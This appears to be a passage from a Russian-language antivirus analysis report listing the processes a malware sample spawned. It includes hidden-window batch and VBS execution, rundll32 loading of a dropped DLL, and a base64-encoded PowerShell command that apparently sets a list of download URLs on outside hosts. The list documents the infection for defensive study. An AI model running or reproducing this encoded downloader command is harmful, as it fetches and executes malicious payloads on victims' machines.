Техническая информация
- '<SYSTEM32>\wscript.exe' %ALLUSERSPROFILE%\tjspowj.vbs
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1464
- %ALLUSERSPROFILE%\uidpjewl.bat
- %ALLUSERSPROFILE%\tjspowj.vbs
- %TEMP%\1266899.cvr
- '<SYSTEM32>\cmd.exe' /c ""%ALLUSERSPROFILE%\uidpjewl.bat" " (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc JABNAEoAWABkAGYAcwBoAEQAcgBmAEcAWgBzAGUAcwA0AD0AIgBoAHQAdABwADoALwAvAGEAbABpAHYAZQBzAHkAcwB0AGUAbQBzAC4AYwBvAG0ALwBlAGwAbgAtAGkAbQBhAGcAZQBzAC8AcABtADIAcgBTAHMAbgBWAE0ALwAsAGgAdAB0AHAAOgAv...
- '<SYSTEM32>\cmd.exe' /c start /B %WINDIR%\syswow64\rundll32.exe %ALLUSERSPROFILE%\puihoud.dll,tjpleowdsyf (со скрытым окном)
- '%WINDIR%\syswow64\rundll32.exe' %ALLUSERSPROFILE%\puihoud.dll,tjpleowdsyf